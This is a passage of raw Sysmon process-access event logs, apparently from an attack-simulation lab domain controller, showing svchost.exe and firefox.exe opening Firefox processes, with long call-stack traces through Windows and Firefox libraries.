Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.504{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.504{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.485{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla 
Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.477{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program 
Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla 
Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program 
Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla 
Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla 